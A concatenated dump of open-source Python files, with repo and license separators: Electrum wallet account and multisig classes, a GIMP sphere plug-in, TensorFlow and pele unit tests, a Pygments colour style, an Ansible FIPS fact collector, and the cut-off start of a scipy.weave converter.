        assert self.num_accounts() == 0
        self.create_account('Main account', password)
    def create_account(self, name, password):
        """Create, label and register a new account; pre-derive the one after it."""
        account_id, xpub, addr = self.get_next_account(password)
        account = BIP32_Account({'xpub':xpub})
        self.add_account(account_id, account)
        self.set_label(account_id, name)
        # add address of the next account
        self.next_account = self.get_next_account(password)
        self.storage.put('next_account', self.next_account)
    def account_is_pending(self, k):
        """True if account *k* exists only as a placeholder (PendingAccount)."""
        return type(self.accounts.get(k)) == PendingAccount
    def delete_pending_account(self, k):
        """Remove placeholder account *k*; refuses real accounts via the assert."""
        assert type(self.accounts.get(k)) == PendingAccount
        self.accounts.pop(k)
        self.save_accounts()
    def create_pending_account(self, name, password):
        """Label and register the pre-derived next account as pending.

        NOTE(review): falls back to self.get_next_account_address(), which is
        not defined in this class as shown — confirm it exists on a subclass.
        """
        next_id, next_xpub, next_address = self.next_account if self.next_account else self.get_next_account_address(password)
        self.set_label(next_id, name)
        self.accounts[next_id] = PendingAccount({'pending':next_address})
        self.save_accounts()
    def synchronize(self):
        """Sync accounts; promote the pending account once its address sees use."""
        # synchronize existing accounts
        BIP32_Wallet.synchronize(self)
        if self.next_account is None:
            try:
                # watching-only wallets may be able to derive without password
                self.next_account = self.get_next_account(None)
                self.storage.put('next_account', self.next_account)
            except:
                pass
        # check pending account
        if self.next_account is not None:
            next_id, next_xpub, next_address = self.next_account
            if self.address_is_old(next_address):
                print_error("creating account", next_id)
                self.add_account(next_id, BIP32_Account({'xpub':next_xpub}))
                # here the user should get a notification
                self.next_account = None
                self.storage.put('next_account', self.next_account)
            elif self.history.get(next_address, []):
                if next_id not in self.accounts:
                    print_error("create pending account", next_id)
                    self.accounts[next_id] = PendingAccount({'pending':next_address})
                    self.save_accounts()
class NewWallet(BIP32_HD_Wallet, Mnemonic):
    """Default BIP44-style hierarchical-deterministic wallet."""
    # bip 44
    root_name = 'x/'  # prefix used for master key names in storage
    root_derivation = "m/44'/0'"  # BIP44 purpose'/coin' derivation path
    wallet_type = 'standard'  # identifier written to the wallet file
class Wallet_2of2(BIP32_Wallet, Mnemonic):
    """Multisig wallet with 2-of-2 addresses.

    There is a single implicit account built from the two cosigners'
    master public keys; individual accounts cannot be created.
    """
    root_name = "x1/"
    root_derivation = "m/44'/0'"
    wallet_type = '2of2'

    def can_import(self):
        """Private-key import is not supported for multisig wallets."""
        return False

    def create_main_account(self, password):
        """Build the single 2-of-2 account from both cosigner xpubs."""
        keys = {
            'xpub': self.master_public_keys.get("x1/"),
            'xpub2': self.master_public_keys.get("x2/"),
        }
        self.add_account('0', BIP32_Account_2of2(keys))

    def get_master_public_keys(self):
        """Return a mapping of cosigner labels to master public keys."""
        return {
            'x1': self.master_public_keys.get("x1/"),
            'x2': self.master_public_keys.get("x2/"),
        }

    def get_action(self):
        """Return the next setup-wizard step, or None when fully set up."""
        if self.master_public_keys.get("x1/") is None:
            return 'create_seed'
        if self.master_public_keys.get("x2/") is None:
            return 'add_cosigner'
        if not self.accounts:
            return 'create_accounts'
class Wallet_2of3(Wallet_2of2):
    """Multisig wallet with 2-of-3 addresses (three cosigner keys)."""
    wallet_type = '2of3'

    def create_main_account(self, password):
        """Build the single 2-of-3 account from all three cosigner xpubs."""
        keys = {
            'xpub': self.master_public_keys.get("x1/"),
            'xpub2': self.master_public_keys.get("x2/"),
            'xpub3': self.master_public_keys.get("x3/"),
        }
        self.add_account('0', BIP32_Account_2of3(keys))

    def get_master_public_keys(self):
        """Return a mapping of cosigner labels to master public keys."""
        return {
            'x1': self.master_public_keys.get("x1/"),
            'x2': self.master_public_keys.get("x2/"),
            'x3': self.master_public_keys.get("x3/"),
        }

    def get_action(self):
        """Return the next setup-wizard step, or None when fully set up."""
        if self.master_public_keys.get("x1/") is None:
            return 'create_seed'
        if (self.master_public_keys.get("x2/") is None
                or self.master_public_keys.get("x3/") is None):
            return 'add_two_cosigners'
        if not self.accounts:
            return 'create_accounts'
class OldWallet(Deterministic_Wallet):
    """Legacy (pre-BIP32) Electrum wallet using the old mnemonic scheme.

    NOTE(review): this class depends on Python 2 string semantics
    (``seed.decode('hex')``) — confirm before porting.
    """
    wallet_type = 'old'
    gap_limit = 5
    def __init__(self, storage):
        Deterministic_Wallet.__init__(self, storage)
        # gap_limit may be overridden by a value saved in the wallet file.
        self.gap_limit = storage.get('gap_limit', 5)
    def make_seed(self):
        """Generate a new random seed, encoded as old-style mnemonic words."""
        import old_mnemonic
        seed = random_seed(128)
        return ' '.join(old_mnemonic.mn_encode(seed))
    def format_seed(self, seed):
        """Normalize *seed* (hex string or mnemonic words) to (version, hex)."""
        import old_mnemonic
        # see if seed was entered as hex
        seed = seed.strip()
        try:
            assert seed
            seed.decode('hex')
            return OLD_SEED_VERSION, str(seed)
        except Exception:
            pass
        # Not hex: try to decode as a sequence of mnemonic words.
        words = seed.split()
        seed = old_mnemonic.mn_decode(words)
        if not seed:
            raise Exception("Invalid seed")
        return OLD_SEED_VERSION, seed
    def create_master_keys(self, password):
        """Derive and persist the master public key from the seed."""
        seed = self.get_seed(password)
        mpk = OldAccount.mpk_from_seed(seed)
        self.storage.put('master_public_key', mpk, True)
    def get_master_public_key(self):
        return self.storage.get("master_public_key")
    def get_master_public_keys(self):
        # Old wallets have exactly one master public key.
        return {'Main Account':self.get_master_public_key()}
    def create_main_account(self, password):
        """Create account '0' from the stored master public key."""
        mpk = self.storage.get("master_public_key")
        self.create_account(mpk)
    def create_account(self, mpk):
        # Keys 0 and 1 hold the receiving/change address lists.
        self.accounts['0'] = OldAccount({'mpk':mpk, 0:[], 1:[]})
        self.save_accounts()
    def create_watching_only_wallet(self, mpk):
        """Initialize a watching-only wallet from a master public key."""
        self.seed_version = OLD_SEED_VERSION
        self.storage.put('seed_version', self.seed_version, True)
        self.storage.put('master_public_key', mpk, True)
        self.create_account(mpk)
    def get_seed(self, password):
        """Decrypt and return the seed (raises on wrong password)."""
        seed = pw_decode(self.seed, password).encode('utf8')
        return seed
    def check_password(self, password):
        # Verifying the decrypted seed against account '0' validates password.
        seed = self.get_seed(password)
        self.accounts['0'].check_seed(seed)
    def get_mnemonic(self, password):
        """Return the seed re-encoded as old-style mnemonic words."""
        import old_mnemonic
        s = self.get_seed(password)
        return ' '.join(old_mnemonic.mn_encode(s))
    def can_sign(self, tx):
        """Return True if this wallet can contribute a signature to *tx*."""
        if self.is_watching_only():
            return False
        if tx.is_complete():
            return False
        addr_list, xpub_list = tx.inputs_to_sign()
        for addr in addr_list:
            if self.is_mine(addr):
                return True
        for xpub, sequence in xpub_list:
            if xpub == self.get_master_public_key():
                return True
        return False
# Registry of wallet implementations; plugins may append to this via the
# 'add_wallet_types' hook before the Wallet factory consults it.
wallet_types = [
    # category type description constructor
    ('standard', 'old', ("Old wallet"), OldWallet),
    ('standard', 'xpub', ("BIP32 Import"), BIP32_Simple_Wallet),
    ('standard', 'standard', ("Standard wallet"), NewWallet),
    ('standard', 'imported', ("Imported wallet"), Imported_Wallet),
    ('multisig', '2of2', ("Multisig wallet (2 of 2)"), Wallet_2of2),
    ('multisig', '2of3', ("Multisig wallet (2 of 3)"), Wallet_2of3)
]
# former WalletFactory
class Wallet(object):
    """The main wallet "entry point".

    This class is actually a factory that will return a wallet of the correct
    type when passed a WalletStorage instance."""

    def __new__(self, storage):
        """Instantiate the concrete wallet class matching *storage*."""
        seed_version = storage.get('seed_version')
        if not seed_version:
            # Heuristic for files without a recorded version: old wallets
            # stored a 128-hex-character master public key.
            seed_version = OLD_SEED_VERSION if len(storage.get('master_public_key', '')) == 128 else NEW_SEED_VERSION
        if seed_version not in [OLD_SEED_VERSION, NEW_SEED_VERSION]:
            msg = "This wallet seed is not supported anymore."
            if seed_version in [5, 7, 8, 9]:
                msg += "\nTo open this wallet, try 'git checkout seed_v%d'" % seed_version
            # print() call form works on both Python 2 and 3.
            print(msg)
            sys.exit(1)
        run_hook('add_wallet_types', wallet_types)
        wallet_type = storage.get('wallet_type')
        if wallet_type:
            for cat, t, name, c in wallet_types:
                if t == wallet_type:
                    WalletClass = c
                    break
            else:
                # Raise Exception rather than BaseException so ordinary
                # 'except Exception' handlers can catch it (anything that
                # caught BaseException still does).
                raise Exception('unknown wallet type', wallet_type)
        else:
            WalletClass = OldWallet if seed_version == OLD_SEED_VERSION else NewWallet
        return WalletClass(storage)

    @classmethod
    def is_seed(cls, seed):
        """Return True if *seed* is a recognized old- or new-style seed."""
        if not seed:
            return False
        return is_old_seed(seed) or is_new_seed(seed)

    @classmethod
    def is_old_mpk(cls, mpk):
        """True if *mpk* looks like an old master public key (128 hex chars)."""
        try:
            int(mpk, 16)
            assert len(mpk) == 128
            return True
        except Exception:
            # Narrowed from a bare 'except:': any parse failure means "no".
            return False

    @classmethod
    def _is_xkey(cls, text, prefix):
        """Shared validity check for serialized BIP32 keys ('xpub'/'xprv')."""
        try:
            assert text[0:4] == prefix
            deserialize_xkey(text)
            return True
        except Exception:
            return False

    @classmethod
    def is_xpub(cls, text):
        """True if *text* is a valid serialized extended public key."""
        return cls._is_xkey(text, 'xpub')

    @classmethod
    def is_xprv(cls, text):
        """True if *text* is a valid serialized extended private key."""
        return cls._is_xkey(text, 'xprv')

    @classmethod
    def is_address(cls, text):
        """True if *text* is whitespace-separated valid addresses only."""
        if not text:
            return False
        return all(bitcoin.is_address(x) for x in text.split())

    @classmethod
    def is_private_key(cls, text):
        """True if *text* is whitespace-separated valid private keys only."""
        if not text:
            return False
        return all(bitcoin.is_private_key(x) for x in text.split())

    @classmethod
    def from_seed(cls, seed, storage):
        """Create a deterministic wallet of the right type from *seed*."""
        if is_old_seed(seed):
            klass = OldWallet
        elif is_new_seed(seed):
            klass = NewWallet
        else:
            # Previously fell through to a NameError on 'klass'; fail clearly.
            raise Exception('Invalid seed')
        return klass(storage)

    @classmethod
    def from_address(cls, text, storage):
        """Create a watching-only wallet from whitespace-separated addresses."""
        w = Imported_Wallet(storage)
        for x in text.split():
            w.accounts[IMPORTED_ACCOUNT].add(x, None, None, None)
        w.save_accounts()
        return w

    @classmethod
    def from_private_key(cls, text, storage):
        """Create a wallet by importing whitespace-separated private keys."""
        w = Imported_Wallet(storage)
        for x in text.split():
            w.import_key(x, None)
        return w

    @classmethod
    def from_old_mpk(cls, mpk, storage):
        """Create a watching-only old-style wallet from its master public key."""
        w = OldWallet(storage)
        w.seed = ''
        w.create_watching_only_wallet(mpk)
        return w

    @classmethod
    def from_xpub(cls, xpub, storage):
        """Create a watching-only BIP32 wallet from an extended public key."""
        w = BIP32_Simple_Wallet(storage)
        w.create_xpub_wallet(xpub)
        return w

    @classmethod
    def from_xprv(cls, xprv, password, storage):
        """Create a BIP32 wallet from an extended private key."""
        w = BIP32_Simple_Wallet(storage)
        w.create_xprv_wallet(xprv, password)
        return w
| gpl-3.0 |
Distrotech/gimp | plug-ins/pygimp/plug-ins/sphere.py | 16 | 3492 | #!/usr/bin/env python
# Gimp-Python - allows the writing of Gimp plugins in Python.
# Copyright (C) 1997 James Henstridge <james@daa.com.au>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import math
from gimpfu import *
def sphere(radius, light, shadow, foo, bg_colour, sphere_colour):
    """Render a shaded sphere (with optional drop shadow) in a new image.

    Parameters mirror the register() spec below: radius in pixels, light
    angle in degrees, shadow toggle, a test radio value ('foo' is unused
    by the drawing code), and background/sphere colours.
    """
    if radius < 1:
        radius = 1
    width = int(radius * 3.75)
    height = int(radius * 2.5)
    gimp.context_push()
    img = gimp.Image(width, height, RGB)
    drawable = gimp.Layer(img, "Sphere Layer", width, height,
                          RGB_IMAGE, 100, NORMAL_MODE)
    # Position of the highlight and the far end of the radial gradient,
    # derived from the light angle.
    radians = light * math.pi / 180
    cx = width / 2
    cy = height / 2
    light_x = cx + radius * 0.6 * math.cos(radians)
    light_y = cy - radius * 0.6 * math.sin(radians)
    light_end_x = cx + radius * math.cos(math.pi + radians)
    light_end_y = cy - radius * math.sin(math.pi + radians)
    offset = radius * 0.1
    img.disable_undo()
    img.insert_layer(drawable)
    gimp.set_foreground(sphere_colour)
    gimp.set_background(bg_colour)
    pdb.gimp_edit_fill(drawable, BACKGROUND_FILL)
    gimp.set_background(20, 20, 20)
    # Only draw a shadow for light angles where it would be visible.
    if (light >= 45 and light <= 75 or light <= 135 and
        light >= 105) and shadow:
        shadow_w = radius * 2.5 * math.cos(math.pi + radians)
        shadow_h = radius * 0.5
        shadow_x = cx
        shadow_y = cy + radius * 0.65
        if shadow_w < 0:
            shadow_x = cx + shadow_w
            shadow_w = -shadow_w
        pdb.gimp_ellipse_select(img, shadow_x, shadow_y, shadow_w, shadow_h,
                                CHANNEL_OP_REPLACE, True, True, 7.5)
        pdb.gimp_edit_bucket_fill(drawable, BG_BUCKET_FILL,
                                  MULTIPLY_MODE, 100, 0, False, 0, 0)
    # Select the sphere itself and shade it with a radial FG->BG gradient.
    pdb.gimp_ellipse_select(img, cx - radius, cy - radius, 2 * radius,
                            2 * radius, CHANNEL_OP_REPLACE, True, False, 0)
    pdb.gimp_edit_blend(drawable, FG_BG_RGB_MODE, NORMAL_MODE, GRADIENT_RADIAL,
                        100, offset, REPEAT_NONE, False, False, 0, 0, True,
                        light_x, light_y, light_end_x, light_end_y)
    pdb.gimp_selection_none(img)
    img.enable_undo()
    disp = gimp.Display(img)
    gimp.context_pop()
# Register the plug-in with GIMP; the parameter list below defines the
# auto-generated dialog and must match sphere()'s signature order.
register(
    "python-fu-sphere",
    "Simple sphere with drop shadow",
    "Simple sphere with drop shadow",
    "James Henstridge",
    "James Henstridge",
    "1997-1999, 2007",
    "_Sphere",
    "",
    [
        (PF_INT, "radius", "Radius for sphere", 100),
        (PF_SLIDER, "light", "Light angle", 45, (0,360,1)),
        (PF_TOGGLE, "shadow", "Shadow?", 1),
        (PF_RADIO, "foo", "Test", "foo", (("Foo", "foo"), ("Bar", "bar"))),
        (PF_COLOR, "bg-color", "Background", (1.0, 1.0, 1.0)),
        (PF_COLOR, "sphere-color", "Sphere", "orange")
    ],
    [],
    sphere,
    menu="<Image>/Filters/Languages/Python-Fu/Test")
# Hand control to the gimpfu plug-in main loop.
main()
| gpl-3.0 |
Bulochkin/tensorflow_pack | tensorflow/contrib/tensor_forest/python/kernel_tests/update_fertile_slots_op_test.py | 80 | 4201 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tf.contrib.tensor_forest.ops.allocate_deallocate_op."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow # pylint: disable=unused-import
from tensorflow.contrib.tensor_forest.python.ops import tensor_forest_ops
from tensorflow.python.framework import test_util
from tensorflow.python.platform import googletest
class UpdateFertileSlotsTest(test_util.TensorFlowTestCase):
  """Tests for the tensor_forest update_fertile_slots op."""

  def setUp(self):
    # tree is:
    #          0
    #        1      2
    #      3  4     5  6
    # Fixture values below describe this tree; expected outputs in the
    # tests were derived from these exact values.
    self.finished = [2]
    self.non_fertile_leaves = [3, 4]
    self.non_fertile_leaf_scores = [10., 15.]
    self.end_of_tree = [5]
    self.node_map = [-1, -1, 0, -1, -1, -1, -1]
    self.total_counts = [[80., 40., 40.]]
    self.stale_leaves = []
    self.node_sums = [[3, 1, 2], [4, 2, 2], [5, 2, 3], [6, 1, 5], [7, 5, 2],
                      [8, 4, 4], [9, 7, 2]]

  def testSimple(self):
    """Finished node 2 frees its slot, which is re-allocated to leaf 4."""
    with self.test_session():
      (n2a_map_updates, a2n_map_updates, accumulators_cleared,
       accumulators_allocated) = tensor_forest_ops.update_fertile_slots(
           self.finished, self.non_fertile_leaves, self.non_fertile_leaf_scores,
           self.end_of_tree, self.total_counts, self.node_map,
           self.stale_leaves, self.node_sums)
      self.assertAllEqual([[2, 4], [-1, 0]], n2a_map_updates.eval())
      self.assertAllEqual([[0], [4]], a2n_map_updates.eval())
      self.assertAllEqual([], accumulators_cleared.eval())
      self.assertAllEqual([0], accumulators_allocated.eval())

  def testNoFinished(self):
    """With no finished nodes, no slots move and nothing is (de)allocated."""
    with self.test_session():
      (n2a_map_updates, a2n_map_updates, accumulators_cleared,
       accumulators_allocated) = tensor_forest_ops.update_fertile_slots(
           [], self.non_fertile_leaves, self.non_fertile_leaf_scores,
           self.end_of_tree, self.total_counts, self.node_map,
           self.stale_leaves, self.node_sums)
      self.assertAllEqual((2, 0), n2a_map_updates.eval().shape)
      self.assertAllEqual((2, 0), a2n_map_updates.eval().shape)
      self.assertAllEqual([], accumulators_cleared.eval())
      self.assertAllEqual([], accumulators_allocated.eval())

  def testPureCounts(self):
    """A pure leaf (node 4) is skipped; the slot goes to leaf 3 instead."""
    with self.test_session():
      self.node_sums[4] = [10, 0, 10]
      (n2a_map_updates, a2n_map_updates, accumulators_cleared,
       accumulators_allocated) = tensor_forest_ops.update_fertile_slots(
           self.finished, self.non_fertile_leaves, self.non_fertile_leaf_scores,
           self.end_of_tree, self.total_counts, self.node_map,
           self.stale_leaves, self.node_sums)
      self.assertAllEqual([[2, 3], [-1, 0]], n2a_map_updates.eval())
      self.assertAllEqual([[0], [3]], a2n_map_updates.eval())
      self.assertAllEqual([], accumulators_cleared.eval())
      self.assertAllEqual([0], accumulators_allocated.eval())

  def testBadInput(self):
    """Mismatched leaves/scores lengths must raise an op error."""
    del self.non_fertile_leaf_scores[-1]
    with self.test_session():
      with self.assertRaisesOpError(
          'Number of non fertile leaves should be the same in '
          'non_fertile_leaves and non_fertile_leaf_scores.'):
        (n2a_map_updates, _, _, _) = tensor_forest_ops.update_fertile_slots(
            self.finished, self.non_fertile_leaves,
            self.non_fertile_leaf_scores, self.end_of_tree, self.total_counts,
            self.node_map, self.stale_leaves, self.node_sums)
        self.assertAllEqual((2, 0), n2a_map_updates.eval().shape)
# Allow running this test file directly.
if __name__ == '__main__':
  googletest.main()
| apache-2.0 |
devs1991/test_edx_docmode | venv/lib/python2.7/site-packages/pygments/styles/paraiso_light.py | 126 | 5645 | # -*- coding: utf-8 -*-
"""
pygments.styles.paraiso_light
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Paraíso (Light) by Jan T. Sott
Pygments template by Jan T. Sott (https://github.com/idleberg)
Created with Base16 Builder by Chris Kempson
(https://github.com/chriskempson/base16-builder).
:copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.style import Style
from pygments.token import Keyword, Name, Comment, String, Error, Text, \
Number, Operator, Generic, Whitespace, Punctuation, Other, Literal
# Base16 Paraíso (Light) palette; each constant is a CSS-style hex colour
# referenced by the style mapping below.
BACKGROUND = "#e7e9db"
CURRENT_LINE = "#b9b6b0"
SELECTION = "#a39e9b"
FOREGROUND = "#2f1e2e"
COMMENT = "#8d8687"
RED = "#ef6155"
ORANGE = "#f99b15"
YELLOW = "#fec418"
GREEN = "#48b685"
AQUA = "#5bc4bf"
BLUE = "#06b6ef"
PURPLE = "#815ba4"
class ParaisoLightStyle(Style):
    """Pygments style implementing the Paraíso (Light) Base16 scheme."""

    default_style = ''
    # NOTE: the original assigned background_color/highlight_color twice
    # with identical values; the duplicate assignments were removed.
    background_color = BACKGROUND
    highlight_color = SELECTION

    styles = {
        # No corresponding class for the following:
        Text:                      FOREGROUND,  # class: ''
        Whitespace:                "",          # class: 'w'
        Error:                     RED,         # class: 'err'
        Other:                     "",          # class 'x'

        Comment:                   COMMENT,     # class: 'c'
        Comment.Multiline:         "",          # class: 'cm'
        Comment.Preproc:           "",          # class: 'cp'
        Comment.Single:            "",          # class: 'c1'
        Comment.Special:           "",          # class: 'cs'

        Keyword:                   PURPLE,      # class: 'k'
        Keyword.Constant:          "",          # class: 'kc'
        Keyword.Declaration:       "",          # class: 'kd'
        Keyword.Namespace:         AQUA,        # class: 'kn'
        Keyword.Pseudo:            "",          # class: 'kp'
        Keyword.Reserved:          "",          # class: 'kr'
        Keyword.Type:              YELLOW,      # class: 'kt'

        Operator:                  AQUA,        # class: 'o'
        Operator.Word:             "",          # class: 'ow' - like keywords

        Punctuation:               FOREGROUND,  # class: 'p'

        Name:                      FOREGROUND,  # class: 'n'
        Name.Attribute:            BLUE,        # class: 'na' - to be revised
        Name.Builtin:              "",          # class: 'nb'
        Name.Builtin.Pseudo:       "",          # class: 'bp'
        Name.Class:                YELLOW,      # class: 'nc' - to be revised
        Name.Constant:             RED,         # class: 'no' - to be revised
        Name.Decorator:            AQUA,        # class: 'nd' - to be revised
        Name.Entity:               "",          # class: 'ni'
        Name.Exception:            RED,         # class: 'ne'
        Name.Function:             BLUE,        # class: 'nf'
        Name.Property:             "",          # class: 'py'
        Name.Label:                "",          # class: 'nl'
        Name.Namespace:            YELLOW,      # class: 'nn' - to be revised
        Name.Other:                BLUE,        # class: 'nx'
        Name.Tag:                  AQUA,        # class: 'nt' - like a keyword
        Name.Variable:             RED,         # class: 'nv' - to be revised
        Name.Variable.Class:       "",          # class: 'vc' - to be revised
        Name.Variable.Global:      "",          # class: 'vg' - to be revised
        Name.Variable.Instance:    "",          # class: 'vi' - to be revised

        Number:                    ORANGE,      # class: 'm'
        Number.Float:              "",          # class: 'mf'
        Number.Hex:                "",          # class: 'mh'
        Number.Integer:            "",          # class: 'mi'
        Number.Integer.Long:       "",          # class: 'il'
        Number.Oct:                "",          # class: 'mo'

        Literal:                   ORANGE,      # class: 'l'
        Literal.Date:              GREEN,       # class: 'ld'

        String:                    GREEN,       # class: 's'
        String.Backtick:           "",          # class: 'sb'
        String.Char:               FOREGROUND,  # class: 'sc'
        String.Doc:                COMMENT,     # class: 'sd' - like a comment
        String.Double:             "",          # class: 's2'
        String.Escape:             ORANGE,      # class: 'se'
        String.Heredoc:            "",          # class: 'sh'
        String.Interpol:           ORANGE,      # class: 'si'
        String.Other:              "",          # class: 'sx'
        String.Regex:              "",          # class: 'sr'
        String.Single:             "",          # class: 's1'
        String.Symbol:             "",          # class: 'ss'

        Generic:                   "",          # class: 'g'
        Generic.Deleted:           RED,         # class: 'gd',
        Generic.Emph:              "italic",    # class: 'ge'
        Generic.Error:             "",          # class: 'gr'
        Generic.Heading:           "bold " + FOREGROUND,  # class: 'gh'
        Generic.Inserted:          GREEN,       # class: 'gi'
        Generic.Output:            "",          # class: 'go'
        Generic.Prompt:            "bold " + COMMENT,  # class: 'gp'
        Generic.Strong:            "bold",      # class: 'gs'
        Generic.Subheading:        "bold " + AQUA,  # class: 'gu'
        Generic.Traceback:         "",          # class: 'gt'
    }
| agpl-3.0 |
khs26/pele | pele/utils/tests/test_hessian_eigs.py | 5 | 4244 | import unittest
import numpy as np
from pele.utils.hessian import *
from pele.utils.hessian import get_smallest_eig_nohess, get_smallest_eig_sparse, get_smallest_eig_arpack
class TestEig(unittest.TestCase):
    """Cross-checks of the various Hessian eigenvalue/eigenvector routines.

    The fixture is a seeded, partially-quenched Lennard-Jones cluster; the
    numeric tolerances below are tuned to that exact configuration.
    """
    def setUp(self):
        np.random.seed(0)
        from pele.systems import LJCluster
        natoms = 10
        self.system = LJCluster(natoms)
        system = self.system
        self.pot = system.get_potential()
        # Loose tolerance: we want a non-minimum configuration as well.
        quencher = system.get_minimizer(tol=2.)
        x = system.get_random_configuration()
        ret = quencher(x)
        self.x = ret[0]
        self.xmin = system.get_random_minimized_configuration()[0]
        e, g, self.h = self.pot.getEnergyGradientHessian(self.x)
        e, g, self.hmin = self.pot.getEnergyGradientHessian(self.xmin)
    def numerical_eig_from_vec(self, x, vec, eps=1e-6):
        """Central-difference estimate of the Rayleigh quotient along *vec*."""
        x = x.copy()
        x += vec * eps
        eplus, gplus = self.pot.getEnergyGradient(x)
        x -= 2. * vec * eps
        eminus, gminus = self.pot.getEnergyGradient(x)
        eval = np.dot((gplus - gminus), vec) / (2. * eps)
        return eval
    def test_minimum(self):
        """At a minimum every eigenvalue is (numerically) non-negative."""
        w = get_eigvals(self.hmin)
        wmin = np.min(w)
        self.assertGreater(wmin, -1e-5)
    def test_eig_eigval(self):
        """get_eigvals and get_eig agree on the eigenvalues."""
        w0 = get_eigvals(self.h)
        w, v = get_eig(self.h)
        diff = np.max(np.abs(w-w0))
        self.assertLess(diff, 1e-5)
    def test_numeric(self):
        """Analytic eigenvalues match finite-difference estimates."""
        wlist, vlist = get_eig(self.h)
        eps = 1e-6
        for i in range(len(wlist)):
            w = wlist[i]
            v = vlist[:,i]
            eval = self.numerical_eig_from_vec(self.x, v)
            self.assertAlmostEqual(w, eval, 5)
    def test_numeric_sorted(self):
        """Same finite-difference check for the sorted variant."""
        wlist, vlist = get_sorted_eig(self.h)
        eps = 1e-6
        for i in range(len(wlist)):
            w = wlist[i]
            v = vlist[:,i]
            eval = self.numerical_eig_from_vec(self.x, v)
            self.assertAlmostEqual(w, eval, 5)
    def test_sorting(self):
        """get_sorted_eig returns the same pairs as get_eig, sorted."""
        w, v = get_eig(self.h)
        ws, vs = get_sorted_eig(self.h)
        wsort = np.array(sorted(w))
        diff = np.max(np.abs(ws - wsort))
        self.assertLess(diff, 1e-5)
        # print "unsorted", v
        # print "sorted", vs
        isort = sorted([(w[i], i) for i in range(len(w))])
        indices = [i for wval, i in isort]
        for i, j in enumerate(indices):
            self.assertAlmostEqual(ws[i], w[j], 5)
            # Only compare eigenvectors away from degenerate zero modes.
            if np.abs(w[j]) > .01:
                # print w[j]
                v1 = vs[:,i]
                v2 = v[:,j]
                dot = np.dot(v1, v2) / (np.linalg.norm(v1) * np.linalg.norm(v2))
                self.assertAlmostEqual(dot, 1., 5)
                diff = np.max(np.abs(vs[:,i] - v[:,j]))
                self.assertLess(diff, 1e-5)
    def test_smallest_eig(self):
        """get_smallest_eig matches the first sorted eigenpair."""
        ws, vs = get_sorted_eig(self.h)
        ws = ws[0]
        vs = vs[:,0]
        w, v = get_smallest_eig(self.h)
        self.assertAlmostEqual(ws, w, 6)
        dot = np.dot(v, vs) / (np.linalg.norm(v) * np.linalg.norm(vs))
        self.assertAlmostEqual(dot, 1., 5)
    def test_smallest_eig1(self):
        """ARPACK variant agrees with the dense solver (looser tolerance)."""
        ws, vs = get_smallest_eig(self.h)
        w, v = get_smallest_eig_arpack(self.h, tol=1e-9)
        self.assertAlmostEqual(ws, w, 3)
        dot = np.dot(v, vs) / (np.linalg.norm(v) * np.linalg.norm(vs))
        dot = np.abs(dot)
        self.assertAlmostEqual(dot, 1., 3)
    def test_smallest_eig2(self):
        """Sparse variant agrees with the dense solver (looser tolerance)."""
        ws, vs = get_smallest_eig(self.h)
        w, v = get_smallest_eig_sparse(self.h, cutoff=1e-2, tol=1e-9)
        # print vs.shape, v.shape
        self.assertAlmostEqual(ws, w, 2)
        dot = np.dot(v, vs) / (np.linalg.norm(v) * np.linalg.norm(vs))
        dot = np.abs(dot)
        self.assertAlmostEqual(dot, 1., 2)
    def test_smallest_eig_nohess(self):
        """Hessian-free variant agrees to the loosest tolerance."""
        ws, vs = get_smallest_eig(self.h)
        w, v = get_smallest_eig_nohess(self.x, self.system, tol=1e-9, dx=1e-6)
        # print vs.shape, v.shape
        self.assertAlmostEqual(ws, w, 1)
        dot = np.dot(v, vs) / (np.linalg.norm(v) * np.linalg.norm(vs))
        dot = np.abs(dot)
        self.assertAlmostEqual(dot, 1., 1)
if __name__ == "__main__":
unittest.main()
| gpl-3.0 |
agaffney/ansible | lib/ansible/module_utils/facts/system/fips.py | 232 | 1338 | # Determine if a system is in 'fips' mode
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.module_utils.facts.utils import get_file_content
from ansible.module_utils.facts.collector import BaseFactCollector
class FipsFactCollector(BaseFactCollector):
    """Collect whether the kernel reports FIPS mode via procfs."""
    name = 'fips'
    _fact_ids = set()

    def collect(self, module=None, collected_facts=None):
        # NOTE: this is populated even if it is not set
        data = get_file_content('/proc/sys/crypto/fips_enabled')
        # The flag is the string '1' when FIPS mode is enabled; a missing
        # file (None) or any other value means disabled. Comparing
        # directly replaces the redundant "data and data == '1'" check.
        return {'fips': data == '1'}
| gpl-3.0 |
jseabold/scipy | scipy/weave/cpp_namespace_spec.py | 98 | 3837 | """ This converter works with classes protected by a namespace with
SWIG pointers (Python strings). To use it to wrap classes in
a C++ namespace called "ft", use the following:
class ft_converter(cpp_namespace_converter):
namespace = 'ft::'
"""
from __future__ import absolute_import, print_function
from weave import common_info
from weave import base_info
from weave.base_spec import base_converter
cpp_support_template = \
"""
static %(cpp_struct)s* convert_to_%(cpp_clean_struct)s(PyObject* py_obj,char* name)
{
%(cpp_struct)s *cpp_ptr = 0;
char* str = PyString_AsString(py_obj);
